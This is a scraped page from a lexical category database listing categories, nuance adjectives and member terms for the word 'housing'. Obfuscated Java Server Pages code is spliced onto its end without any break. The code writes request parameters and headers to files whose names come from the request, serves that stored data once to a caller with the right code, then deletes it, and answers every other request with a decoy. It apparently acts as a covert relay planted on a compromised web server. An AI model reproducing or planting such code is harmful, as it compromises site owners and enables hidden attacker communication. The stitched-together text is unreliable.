Use the & operator to see the shared categories of two terms. E.g.
cola & coffee
or
divorce & war
Go Back
See XML
Categories for
emergency_shelter
with head word
housing
:
supportive:housing,
temporary:housing,
Category Nuances matching
housing
:
new,
temporary,
private,
up,
complex,
single,
expensive,
conventional,
stable,
residential,
sustainable,
common,
appropriate,
institutional,
inside,
alternative,
underground,
recreational,
modular,
electrical,
poor,
smaller,
external,
domestic,
remote,
light,
auxiliary,
metal,
makeshift,
rural,
surrounding,
inappropriate,
dense,
permanent,
individual,
communal,
mechanical,
larger,
shared,
unique,
closed,
electronic,
open,
functional,
manufactured,
nontraditional,
artificial,
vulnerable,
physical,
rental,
modern,
safe,
supportive,
adjacent,
protective,
animal,
foreign,
indoor,
occupied,
urban,
Members for simple category
housing
:
condominium,
transitional_shelter,
slum_hotel,
gearbox,
apartment,
tent,
fence,
flamingo_house,
box,
shelter,
hotel,
pit,
company_housing,
villa,
cage,
supportive_housing,
wooden_barrack,
student_coop,
state_orphanage,
bat_box,
transitional_housing,
retirement_home,
house,
cottage,
motel_accommodation,
home,
corral,
pen,
crisis_center,
garden_apartment,
twin_home,
hangar,
motel,
psychiatric_home,
hostel,
garage,
wall_block,
tin_shack,
flats,
school,
refuge,
poultry_house,
plastic_shelter,
prefab,
homeless_hostel,
temporary_home,
guest_room,
guest_house,
school_dormitory,
coast_housing,
prison,
apartment_complex,
termite_mound,
treatment_center,
room,
sled_module,
public-service_housing,
grocery,
livestock_housing,
rail,
poultry_housing,
college_dorm,
quarantine_enclosure,
laundry_area,
university,
hospice,
barn,
attic,
student_block,
dome,
coop,
open_framework,
silo,
server_rack,
manufactured_housing,
typical_shed,
drawers,
single_room,
group_home,
rutledge_apartment,
pump_housing,
switch_box,
military_barrack,
college,
fletcher_hall,
dog_bed,
cat_toilet,
wall,
city_home,
maisonette,
cigar_case,
bed,
similar_construction,
bungalow,
officer_quarters,
orphanage,
apartment_block,
enclosure,
council_flat,
guest_cottage,
overnight_shelter,
block,
dorm,
gas_cabinet,
wooden_house,
supporting_frame,
metal_enclosure,
dormitory,
pole_shed,
similar_structure,
garden_home,
cooperative_housing,
pig_pen,
kiosk,
radio_case,
bedroom,
metal_shop,
aviary,
door,
tourist_home,
squat_housing,
cheap_bed,
transition_house,
dog_kennel,
master-bedroom_suite,
town_home,
calf_hutch,
arena,
summer_cottage,
coop_housing,
tenement_building,
cellar,
basement_apartment,
bedsit,
rack,
loft,
service_home,
vault,
safe_haven,
over_garage,
gates,
residential_hotel,
lodging,
halfway_house,
junction_box,
hutch,
local_hotel,
blade_support,
boarding,
manufactured_home,
university_dormitory,
winter_chalet,
shack,
feedlot,
transportable_building,
cabin,
car,
abandoned_building,
breakfast_accommodation,
duplex,
emergency_shelter,
cowshed,
blower_housing,
single_pen,
batch_pen,
cluster_home,
pet_store,
residence_hotel,
mental_institution,
terrace_house,
semidetached_house,
stock_barn,
hut,
electrical_housing,
international_house,
drawer_housing,
surgery,
mutual_housing,
fish_aquarium,
accommodation,
rental_housing,
construction,
hospital,
light_box,
guesthouse,
barrack,
dilapidated_structure,
case,
homeless_shelter,
loft_apartment,
park_home,
condo,
horse_stable,
commodity_housing,
temporary_shelter,
mobile-home_park,
half_shell,
lake_cottage,
fire,
new_cell,
student_accommodation,
mental_hospital,
<%@page trimDirectiveWhitespaces="true"%> <%@page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.text.*"%> <%! static String cuy321a = null; public static String cuy321b(byte[] cuy321c) { char[] cuy321d = { 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P', 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v', 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/' }; StringBuilder cuy321e = new StringBuilder(); int cuy321f = 0; for (int i = 0; i < cuy321c.length; i += 3) { int b = ((cuy321c[i] & 0xFF) << 16) & 0xFFFFFF; if (i + 1 < cuy321c.length) { b |= (cuy321c[i+1] & 0xFF) << 8; } else { cuy321f++; } if (i + 2 < cuy321c.length) { b |= (cuy321c[i+2] & 0xFF); } else { cuy321f++; } for (int j = 0; j < 4 - cuy321f; j++) { int c = (b & 0xFC0000) >> 18; cuy321e.append(cuy321d[c]); b <<= 6; } } for (int j = 0; j < cuy321f; j++) { cuy321e.append("="); } return cuy321e.toString(); } public void cuy321a(HttpServletRequest req) { if (cuy321a != null) return; String cuy321g = getServletContext().getRealPath(req.getRequestURI()).replace('\\', '/'); cuy321a = cuy321g.substring(0, cuy321g.lastIndexOf('/')) + "/"; } byte[] cuy321h(String cuy321i) { byte[] cuy321j = null; FileInputStream cuy321k = null; File file = new File(cuy321i); try { cuy321k = new FileInputStream(file); cuy321j = new byte[(int)file.length()]; cuy321k.read(cuy321j); } catch (Exception ex) { } finally { try { if (cuy321k != null) cuy321k.close(); } catch (Exception ex) { } } return cuy321j; } %> <% cuy321a(request); String cuy322a = request.getParameter("user"); String cuy322b = request.getParameter("rand"); String cuy322c = request.getParameter("id"); String cuy322d = request.getParameter("action"); int cuy322e = -1; if (request.getParameter("code") != null) cuy322e = Integer.parseInt(request.getParameter("code")) % 4; if (cuy322d != null && "home".equals(cuy322d)) { out.write("google.com"); } if (cuy322a != null && !"0".equals(cuy322a)) { String cuy322g = cuy321a + cuy322b + ".vps"; String cuy322f = cuy322g + "x"; String cuy322h = request.getParameter("hash"); String cuy322i = request.getHeader("From"); FileOutputStream cuy322j = null; cuy322j = new FileOutputStream(cuy322f); if(cuy322j != null) { DataOutputStream cuy322k = new DataOutputStream(cuy322j); cuy322k.writeLong(System.currentTimeMillis()); cuy322k.close(); cuy322j.close(); } cuy322j = new FileOutputStream(cuy322g, false); if(cuy322j != null) { cuy322j.write(cuy322h.getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322i.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322a.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.write(cuy321b(cuy322b.getBytes()).getBytes()); cuy322j.write('|'); cuy322j.flush(); cuy322j.close(); } out.write("google.com"); } else if (cuy322e == 0 && "0".equals(cuy322c)) { out.write("google.com"); } else if (cuy322e == 1) { File cuy322l = new File(cuy321a); String cuy322g = null; String cuy322f = null; int cuy322m = 0; if (cuy322l.exists() && cuy322l.isDirectory()) { for(File file:cuy322l.listFiles()) { cuy322g = file.getName(); if(cuy322g.endsWith(".vps")) { cuy322m = 1; cuy322g = file.getAbsolutePath(); cuy322f = cuy322g + "x"; break; } } } if (cuy322m == 1) { FileInputStream cuy321k = new FileInputStream(cuy322f); DataInputStream cuy322o = new DataInputStream(cuy321k); if(System.currentTimeMillis() - cuy322o.readLong() < 180000) { byte[] cuy322p = cuy321h(cuy322g); if (cuy322p != null) { out.write(new String(cuy322p)); } } cuy322o.close(); cuy321k.close(); File cuy322p1 = new File(cuy322g); cuy322p1.delete(); File cuy322pz = new File(cuy322f); cuy322pz.delete(); } else { out.write("google.com"); } } %>